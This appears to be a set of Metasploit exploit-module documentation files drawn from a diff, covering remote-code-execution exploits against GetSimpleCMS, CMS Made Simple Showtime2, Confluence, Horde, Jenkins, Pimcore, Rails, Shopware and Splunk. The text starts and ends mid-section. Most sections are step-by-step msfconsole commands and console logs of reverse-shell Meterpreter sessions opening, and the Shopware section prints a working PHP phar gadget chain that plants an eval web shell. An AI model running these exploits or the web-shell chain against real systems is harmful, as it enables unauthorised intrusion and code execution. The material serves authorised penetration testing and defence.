msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137
rhosts => 192.168.37.137
msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true
verbose => true
msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] GetSimpleCMS version 3315
[*] Sending stage (38247 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >
```
@@ -0,0 +1,70 @@
## Description
This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability.
The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 and 2.2.10
## Vulnerable Application
Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2
## Verification Steps
1. Setting up a working installation of CMS Made Simple (CMSMS)
2. Download Showtime2 module (< 3.6.3)
3. Log-in to admin panel with the administrator credentials
4. Go in *site admin* => *Module Manager* and import the Showtime2 module
5. Once the module is uploaded, click on *install* to install the module
6. [OPTIONALLY] setting up a new user, assign it to a group and set the *Use Showtime2* permissions on group
7. Start `msfconsole`
8. `use exploit/multi/http/cmsms_showtime2_rce`
9. `set RHOST <IP>`
10. `set USERNAME <USERNAME>`
11. `set PASSWORD <PASSWORD>`
12. `check`
13. You should see `The target appears to be vulnerable.`
14. `exploit`
15. You should get a meterpreter session!
## Options
* **TARGETURI**: Path to CMS Made Simple (CMSMS) App installation (“/” is the default)
* **USERNAME**: Username to authenticate with
* **PASSWORD**: Password to authenticate with
## Scenario
### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10
```
msf5 > use exploit/multi/http/cmsms_showtime2_rce
msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com
rhost => target.com
msf5 exploit(multi/http/cmsms_showtime2_rce) > check
[*] Showtime2 version: 3.6.2
[*] 192.168.2.59:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer
username => Designer
msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r
password => d3s1gn3r
msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit
[*] Started reverse TCP handler on 10.0.8.2:4444
[*] Showtime2 version: 3.6.2
[*] Uploading PHP payload.
[*] Making request for '/06wp7Fen.php' to execute payload.
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:59932) at 2019-03-19 23:27:07 +0100
[!] Tried to delete ./06wp7Fen.php, unknown result
meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/http/cmsms_showtime2_rce) >
```
@@ -0,0 +1,161 @@
# Description
This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.
The vulnerability exists in the Widget Connector Macro which allow inject the "\_template" from the outside for some services, such as Youtube, Viddler, DailyMotion, etc.
The module has been tested with on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payload.
References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
# Vulnerable Application
Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.
# Verification Steps
- [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/confluence_widget_connector`
- [ ] `set RHOST <IP>`
- [ ] `set RPORT <PORT>`
- [ ] `set SRVHOST <HOST_IP>`
- [ ] `check`
- [ ] You should see `The target is vulnerable`
- [ ] `exploit`
- [ ] You should get a meterpreter session.
# Options
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)
# Scenario
## Tested on Confluence 6.8.2 with Windows target
```
msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set TARGET Windows
TARGET => Windows
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
```
## Tested on Confluence 6.8.2 with Java target
```
msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: confluence
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
```
## Tested on Confluence 6.8.2 with Linux target
```
msf5 > use exploit/multi/http/confluence_widget_connector
msf5 exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf5 exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf5 exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf5 exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf5 exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf5 exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/http/confluence_widget_connector) >
```
@@ -0,0 +1,101 @@
Horde Groupware Webmail is a popular open-source groupware platform written in PHP. A vulnerability allows an authenticated, unprivileged user to create a malicious PHP file under the web root and gain arbitrary code execution on the server.
## Vulnerable Application
The Horde subcomponent Horde Form < 2.0.19 is affected. This module was specifically tested against Horde Groupware Webmail Edition 5.2.22 and 5.2.17 with Horde Form 2.0.18 installed with PEAR on Debian.
### Docker install on Ubuntu 18.04
Please folow these steps to setup a vulnerable version of Horde in Docker on a Ubuntu.
1. Set up a [Ubuntu](http://www.ubuntu.com/) 18.04 box.
2. Open a terminal, and enter: ```sudo apt-get install docker.io```. Make sure Docker is properly configured and your current user has permession to use it.
3. Enter: ```mkdir horde_form_file_upload``` to create a folder.
4. Enter: ```cd horde_form_file_upload``` to enter that folder.
5. Create a ```Dockerfile``` in it with the following content.
```
FROM debian
RUN apt-get update
RUN apt-get install --yes --no-install-recommends \
apache2 \
ca-certificates \
dovecot-imapd \
libapache2-mod-php \
mysql-server \
php-mysqli \
php-pear \
rsyslog
RUN pear upgrade PEAR
RUN pear channel-discover pear.horde.org
RUN pear install horde/horde_role
RUN rm -r /var/www/html/ && mkdir /var/www/html/
RUN echo /var/www/html/ | pear run-scripts horde/Horde_Role
RUN pear install -a -B horde/webmail-5.2.22
# Uninstall end reinstall the vulnerable version
RUN pear uninstall -n horde/Horde_Form
RUN pear install -a -B horde/Horde_Form-2.0.18
RUN sed -i "/'secure' => 'tls',/d" /var/www/html/imp/config/backends.php
RUN chown -R www-data:www-data /var/www/html/
RUN useradd -m -G mail user && echo 'user:user' | chpasswd
RUN echo 'disable_plaintext_auth = no' | tee /etc/dovecot/conf.d/99-auth.conf
ENTRYPOINT \
/etc/init.d/mysql start && \
echo 'CREATE DATABASE IF NOT EXISTS horde;' | mysql && \
echo 'CREATE USER IF NOT EXISTS horde;' | mysql && \
echo 'GRANT ALL ON horde.* TO horde IDENTIFIED BY "horde";' | mysql && \
{ echo mysqli; sleep 0.3; \
echo horde; sleep 0.3; \
echo horde; sleep 0.3; \
echo tcp; sleep 0.3; \
echo localhost; sleep 0.3; \
echo; sleep 0.3; \
echo horde; sleep 0.3; \
echo; sleep 0.3; \
echo false; sleep 0.3; \
echo; sleep 0.3; \
echo 1; sleep 0.3; } | webmail-install && \
dovecot && \
/etc/init.d/apache2 start && \
tail -F /var/log/apache2/access.log /var/log/syslog
```
6. Enter: ```docker build . -t horde-img``` to build the Docker image.
7. Enter: ```docker run -p8888:80 --name horde-inst horde-img``` to run the Docker instance with the name ```horde-inst```.
8. Get the Docker host ip for reverse connection. In Linux, enter: ```ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+'```.
## Verification Steps
After setting up Horde, you can use your exploit module:
1. Start msfconsole
2. Do: ```use exploit/multi/http/horde_form_file_upload```
3. Do: ```set RHOSTS 127.0.0.1```
4. Do: ```set RPORT 8888```
5. Do: ```set payload php/meterpreter/reverse_tcp```
6. Do: ```set LHOST [HOST IP]```
7. Do: ```set VHOST horde.lab```
8. Do: ```set USERNAME user ```
9. Do: ```set PASSWORD user```
10. Do: ```exploit```
11. And you should get a session
## Scenarios
### Horde Groupware Webmail Edition 5.2.22 with Horde Form 2.0.18 on a Debian stretch on Docker running on an Ubuntu 16.04
```
msf exploit(multi/http/horde_form_file_upload) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Uploading payload to ../var/www/html/static/mxkyfrlztogn.php
[*] Sending stage (38247 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:47720) at 2019-03-29 15:27:53 +0000
meterpreter >
```
@@ -0,0 +1,88 @@
## Intro
This module exploits a vulnerability in Jenkins dynamic routing to
bypass the `Overall/Read` ACL and leverage Groovy metaprogramming to
download and execute a malicious JAR file.
When the `Java Dropper` target is selected, the original entry point
based on `classLoader.parseClass` is used, which requires the use of
Groovy metaprogramming to achieve RCE.
When the `Unix In-Memory` target is selected, a newer, higher-level,
and more universal entry point based on `GroovyShell.parse` is used.
This permits the use of in-memory arbitrary command execution.
The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
on later versions of Jenkins.
Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
## Setup
1. `git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc`
2. `cd cve-2019-1003000-jenkins-rce-poc/sample-vuln`
3. Edit `run.sh` and change `2.152-alpine` to `2.137`
4. `./run.sh`
## Targets
```
Id Name
-- ----
0 Unix In-Memory
1 Java Dropper
```
## Options
**RPORT**
Set this to the Jenkins port. The default is 8080.
**TARGETURI**
Set this to the Jenkins base path. The default is `/`.
**SRVPORT**
Set this to the port on which to serve the payload. Change it from 8080
to something like 8081 if you are testing Jenkins locally on port 8080.
This option is valid only for the `Java Dropper` target.
**ForceExploit**
Set this to `true` to override the `check` result during exploitation.
## Usage
```
msf5 exploit(multi/http/jenkins_metaprogramming) > run
[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Configuring Java Dropper target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer : 6f21b8da2915
OS : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >
```
@@ -0,0 +1,110 @@
## Description
This module exploits a PHP (unserialize()) in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability.
The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method make it possible to exploit the unserialize function when passing untrusted values in "data" parameter.
Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.6.6 with the Symfony unserialize payload.
Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.
## Vulnerable Application
Affecting Pimcore, version 5.x <= 5.6.6 and 4.x.
## Verification Steps
Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-project pimcore/skeleton my-project` for the 5.x branch) as described on [Pimcore Installation documentation](https://pimcore.com/docs/5.x/Development_Documentation/Getting_Started/Installation.html) then:
1. Start `msfconsole`
2. `use exploit/multi/http/pimcore_unserialize_rce`
3. `set RHOST <IP>`
4. `set USERNAME <USERNAME>`
5. `set PASSWORD <PASSWORD>`
6. `check`
7. You should see `The target service is running, but could not be validated.`
8. `exploit`
9. You should get a meterpreter session!
## Options
* **TARGETURI**: Path to Pimcore installation (“/” is the default)
* **USERNAME**: Username to authenticate with
* **PASSWORD**: Password to authenticate with
## Scenario
### Tested on Pimcore 5.6.6
```
msf5 > use exploit/multi/http/pimcore_unserialize_rce
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
rhost => target.com
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8566
rport => 8566
msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
username => admin
msf5 exploit(multi/http/pimcore_unserialize_rce) > set password pimcore
password => pimcore
msf5 exploit(multi/http/pimcore_unserialize_rce) > check
[*] 192.168.2.59:8566 - The target service is running, but could not be validated.
msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
[*] Started reverse TCP handler on 10.0.8.2:4444
[+] Authentication successful: admin:pimcore
[*] Pimcore version: 5.6.6
[*] Pimcore build: 9722d19576f9e49969d4a3708e045fa481eaad02
[+] The target is vulnerable!
[+] JSON paylod uploaded successful: /var/www/html/var/tmp/bulk-import.tmp
[*] Selected payload: Pimcore 5.x (Symfony unserialize payload)
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:34128) at 2019-04-07 12:04:08 +0200
[!] This exploit may require manual cleanup of '/var/www/html/var/tmp/bulk-import.tmp' on the target
meterpreter >
[+] Deleted /var/www/html/var/tmp/bulk-import.tmp
meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/http/pimcore_unserialize_rce) >
```
### Tested on Pimcore 4.6.5
```
msf5 > use exploit/multi/http/pimcore_unserialize_rce
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com
rhost => target.com
msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8465
rport => 8465
msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin
username => admin
msf5 exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n
password => P1mc0r3_4dm1n
msf5 exploit(multi/http/pimcore_unserialize_rce) > check
[*] 192.168.2.59:8465 - The target service is running, but could not be validated.
msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit
[*] Started reverse TCP handler on 10.0.8.2:4444
[+] Authentication successful: admin:P1mc0r3_4dm1n
[*] Pimcore version: 4.6.5
[*] Pimcore build: 4123
[+] The target is vulnerable!
[+] JSON paylod uploaded successful: /var/www/html/website/var/system/bulk-import.tmp
[*] Selected payload: Pimcore 4.x (Zend unserialize payload)
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:57882) at 2019-04-07 12:00:20 +0200
[+] Deleted /var/www/html/website/var/system/bulk-import.tmp
meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/http/pimcore_unserialize_rce) >
```
@@ -0,0 +1,105 @@
# Ruby on Rails DoubleTap Development Mode secret_key_base Vulnerability
## Background
Ruby on Rails is a server-side web application framework written in Ruby. It is a model-view-controller (MVC) architecture, providing default structures for a database, a web service, and web pages. It is also a popular choice of framework among well known services and products such as Github, Bloomberg, Soundcloud, Groupon, Twitch.tv, and of course, Rapid7s Metasploit.
In development mode, Ruby on Rails versions including 5.2.2 and prior are vulnerable to a remote code execution vulnerability due to a predictable secret_key_base based on the name of the Rails application, and use it to create a signed serialized payload, and gain remote code execution.
## Vulnerable Setup
In order to set up a vulnerable box for testing, do this on a Linux machine (such as Ubuntu), and assuming you already have rvm installed:
```
$ rvm gemset create test
$ rvm gemset use test
$ gem install rails '5.2.1'
$ rails new demo
```
Next, `cd` to demo, and then modify the Gemfile like this:
```
$ echo "gem 'rails', '5.2.1'" >> Gemfile
$ echo "gem 'sqlite3', '~> 1.3.6', '< 1.4'" >> Gemfile
$ echo "source 'https://rubygems.org'" >> Gemfile
$ bundle
```
Next, add a new controller:
```
rails generate controller metasploit
```
And add the index method for that controller (under app/controllers/metasploit_controllers.rb):
```
class MetasploitController < ApplicationController
def index
render file: "#{Rails.root}/test.html"
end
end
```
In the root directory, add a new test.html:
```
echo Hello World > test.html
```
Also, add that new route in config/routes.rb:
```
Rails.application.routes.draw do
resources :metasploit
end
```
And finally, start the application (since no mode is specified, by default, it is development mode):
```
rails s -b 0.0.0.0
```
## Demonstration
### Server
```
$ rails server -b 0.0.0.0
=> Booting Puma
=> Rails 5.2.1 application starting in development
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.1 (ruby 2.6.0-p0), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
```
### Metasploit
```
msf5 exploit(multi/http/rails_double_tap) > check
[+] 172.16.249.141:3000 - The target is vulnerable.
msf5 exploit(multi/http/rails_double_tap) > exploit
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Attempting to retrieve the application name...
[*] The application name is: Demo
[*] Stager ready: 433 bytes
[*] Sending serialized payload to target (1250 bytes)
[*] Sending stage (985320 bytes) to 172.16.249.141
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:62572) at 2019-04-25 16:29:43 -0500
[+] Deleted /tmp/LsvSGK.bin
[+] Deleted /tmp/tSJfp.bin
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > pwd
/home/sinn3r/demo
meterpreter >
```
@@ -0,0 +1,117 @@
## Background
Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..
In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to the ability of leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
## Vulnerable Application
The following is the exact setup I used to test and analyze the vulnerability:
- Debian GNU/Linux 9 (stretch) x64
- MariaDB latest
- Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo
For installation instructions, please refer to the [Shopware installation guide](https://github.com/shopware/shopware#installation-via-git).
## References
- [https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/](https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/)
## Notes
The recommended CVSS score is 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
## POP Chain
In order to pivot from an object instantiation bug to a object injection primitive, we need something worth while deserializing:
```php
<?php
namespace GuzzleHttp\Cookie;
// pop chain
interface ToArrayInterface {}
class SetCookie implements ToArrayInterface {
private $data;
public function __construct(array $data = []){
$this->data = $data;
}
}
class CookieJar implements ToArrayInterface {
private $cookies;
public function setCookie(SetCookie $cookie){
$this->cookies = array($cookie);
}
}
class FileCookieJar extends CookieJar {
private $filename;
public function __construct($bd_file){
$this->filename = $bd_file;
$this->setCookie(new SetCookie(array(
"Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
"Expires" => true,
"Discard" => false,
)));
}
}
$phar = new \Phar('poc.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$o = new FileCookieJar("/var/www/html/media/image/si.php");
$phar->setMetadata($o);
$phar->stopBuffering();
?>
```
## Credit
Steven Seeley (mr_me) of Source Incite
## Demo
```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc
[*] Processing scripts/shopware.rc for ERB directives.
resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (scripts/shopware.rc)> set LHOST 192.168.23.1
LHOST => 192.168.23.1
resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
RHOSTS => 192.168.23.164
resource (scripts/shopware.rc)> set RPORT 8080
RPORT => 8080
resource (scripts/shopware.rc)> check
[+] 192.168.23.164:8080 - The target is vulnerable.
resource (scripts/shopware.rc)> exploit
[*] Started reverse TCP handler on 192.168.23.1:4444
[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
[+] Stage 2 - leaked the webroot: /var/www/html
[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
[+] Stage 4 - generated our phar
[+] Stage 5 - uploaded phar
[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
[+] Stage 7 - triggered object instantiation!
[*] Sending stage (38247 bytes) to 192.168.23.174
[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
[+] Deleted rguktpcw.php
[+] Deleted image/6b/7e/0c/eiuzuoii.jpg
meterpreter > sysinfo
Computer : 45835d649528
OS : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
Meterpreter : php/linux
meterpreter >
```
@@ -0,0 +1,244 @@
## Vulnerable Application
This module exploits a feature of Splunk whereby a custom application can be
uploaded through the web based interface. Through the `script` search command a
user can call commands defined in their custom application which includes arbitrary
perl or python code. To abuse this behavior, a valid Splunk user with the admin
role is required. By default, this module uses the credential of "admin:changeme",
the default Administrator credential for Splunk.
Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default.
This module has been tested successfully against:
* 5.0 ([Ubuntu 10.04](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564), [Windows XP and Windows Server 2003 SP2](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564) with splunk-5.0.1-143156)
* 6.1, 6.1.1
* 7.2.4 (OSX 10.14.3, Windows 10 10.0.17134.1, CentOS7 3.10.0-957.1.3.el7.x86_64)
## Verification Steps
1. Start msfconsole
2. Do: ```use exploit/multi/http/splunk_upload_app_exec```
3. Set required variables (you will need admin credentials)
4. Do: ```SET LHOST [ip]```
5. Do: ```SET RHOST [ip]```
6. Set a payload:
* If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected.
* If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected.
7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target)
## External Demo
* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
## Options
**EnableOverwrite**
Overwrites an app of the same name. Needed if you change the app code in the tgz.
Default is `false`
**USERNAME**
Username for Splunk. Default is `admin`
**PASSWORD**
Default is `changeme`
## Scenarios
### Tested against 7.2.4 running on OSX 10.14.3
```
msf5 exploit(multi/http/splunk_upload_app_exec) >
msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1
RHOST => 172.16.165.1
msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk
password => splunksplunk
msf5 exploit(multi/http/splunk_upload_app_exec) > show targets
Exploit targets:
Id Name
